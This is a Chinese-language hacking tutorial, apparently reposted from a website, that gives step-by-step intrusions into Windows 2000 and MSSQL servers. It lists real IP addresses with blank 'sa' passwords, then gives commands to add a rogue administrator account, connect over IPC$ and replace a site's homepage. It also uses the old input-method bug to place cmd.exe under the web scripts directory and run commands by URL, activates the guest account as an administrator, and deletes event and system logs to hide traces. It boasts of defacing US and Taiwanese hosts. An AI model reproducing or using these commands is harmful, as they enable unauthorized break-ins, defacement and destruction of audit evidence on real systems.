流行的漏洞入侵(二)

4 SQL攻擊網站
這個也很方便,呵呵,上次在對美國大戰中也有不少兄弟是用這種方法的,來看看吧
我們需要小榕的流光作為武器,到WWW.NETEYES.COM去DOWN一個
運行流光然后按快捷鍵ctrl＋r搜索！
選擇aql！輸入開始和結束的IP！掃描吧！到搜索結束！察看流光最下面的視圖！格式如下：
用戶名 密碼 地址
sa 211.21.220.28
sa 211.21.220.26
sa 211.21.220.197
其中《null》表示密碼為空！
雙擊其中一項（或在工具……>SQL登錄）！會彈出一個dos窗口！如果過一會該窗口消失！沒戲了！對方不支持遠程登錄！在換一個！如果過一會出現如下的字樣：
SQL Remote Cmd For Fluxay 2001 by Assassin 1995 - 2000. Thanks to Eyas!
Connect to 211.21.220.28 MSSQL Server Suclearcase/" target="_blank" >ccess, Type Command in Prompt.
SQLCmd>
那表示已經登錄上了對方的主機！然后
SQLCmd>net user ‘察看用戶！如果不能察看，說明sa權限不夠，那也沒戲，換其他的方法！或是走人！有時用net user察看成功！再試試
SQLCmd>net user administrator ’察看Admin的情況（可知是否在線）如果失敗，撤退吧，
沒戲，換方法！ 沒有權限,但是如果可以的話
下一步：
SQLCmd>net user hacker password /add @#添加一給名為hacker，密碼為passwod的用戶！
SQLCmd>net localgroup administrators hacker /add @# 把剛才創建的用戶加入 Admnistrators組

好了，告一段落，下面啟動DOS用剛創建的用戶進行ipc$
net use \\*.*.*.*\ipc$ "password" /user:"hacker" @#很熟悉吧！IPC$開始了！
執行成功的話！搞吧！刪除！上傳！下載！要什么！隨你！
例如copy c:\hacker\index.htm \\IP\c$\inetpub\wwwroot\default.htm (IP為它的IP)
干什么，換他的主頁??！呵呵！

據我的實踐！針對臺灣的主機！另一方法是用剛創建的用戶名和密碼用CuteFtp登錄！就象管理自己的站點一樣！任意刪除創建Html頁面！此方法對美國的主機沒有成功過！我都是IPC$搞定的！

以上的原理是用SQL開門！用IPC$進門做作administrator可以作的事！但對于SQL主機！Administrator一般沒有對數據庫刪除或創建的權限！此時可以down下他的sam文件解密(怎么DOWN?暈,看看我在上面UNICODE中寫的教材)！默認用戶名SQLAgentCmdExec，然后用天行的SQlBrowse登錄就可以對數據庫任意操作了！

5 利用輸入法漏洞
要說老美真不是東西,這么大個洞現在還尚存人間,也好,大家可以練練手
1、用端口掃瞄程序掃IP的3389端口，得到xx.xx.xx.xx。

　 2、運行windows2000終端客戶程序，在服務器輸入框里填入：xx.xx.xx.xx ，連接。

　 3、出現windows2000的登陸窗口，按下CTRL+SHIFT鍵，出現全拼輸入法。

　 4、在輸入法狀態條上按mouse右鍵，選擇幫助，選擇輸入指南，選擇"選項"按右鍵。

　 5、選擇"跳轉到URL"，輸入：c:\winnt\system32\cmd.exe.

　 6、選擇"保存到磁盤"。

　 7、選擇目錄：c:\inetpub\scripts\

　 8、打開IE，輸入：xx.xx.xx.xx/scripts/cmd.exe?/c+dir+c:\ （知道了吧）

　 9、輸入：xx.xx.xx.xx/scripts/cmd.exe?/c+echo+BEIJING+>c:\inetpub\wwwroot\default.asp

還有一種方法
1.掃描 3389 port 終端服務默認；
2.用終端客戶端程序進行連接；
3.按ctrl+shift調出全拼輸入法（其他似乎不行），點鼠標右鍵（如果其幫助菜單發灰，就趕快趕下家吧，人家打補丁了），點幫助，點輸入法入門；
4.在"選項"菜單上點右鍵--->跳轉到URL"，輸入：c:\winnt\system32\cmd.exe.（如果不能確定NT系統目錄，則輸入：c:\ 或d:\ ……進行查找確定）；
5.選擇"保存到磁盤" 選擇目錄：c:\inetpub\scripts\，因實際上是對方服務器上文件自身的復制操作，所以這個過程很快就會完成；
6.打開IE，輸入： dir 怎么樣？有cmd.exe文件了吧？這我們就完成了第一步；
7. echo net user guest /active:yes>go.bat
8. echo net user guest elise>>go.bat
9. echo net localgroup administrators /add guest>>go.bat
10. type go.bat 看看我們的批文件內容是否如下：

net user guest /active:yes
net user guest elise
net localgroup administrators /add guest
11.在"選項"菜單上點右鍵--->跳轉到URL"，輸入：c:\inetpub\scripts\go.bat --->在磁盤當前位置執行；
12.呵呵，大功告成啦，這樣我們就激活了服務器的geust帳戶，密碼為：elise，超級用戶呢！ （我喜歡guest而不是建立新帳戶，這樣似乎不易被發現些），
最后一定別不記的X掉自已的腳印
del+C:\winnt\system32\logfiles\*.*
del+C:\winnt\ssytem32\config\*.evt
del+C:\winnt\system32\dtclog\*.*
del+C:\winnt\system32\*.log
del+C:\winnt\system32\*.txt
del+C:\winnt\*.txt
del+C:\winnt\*.log

原文轉自：http://www.kjueaiud.com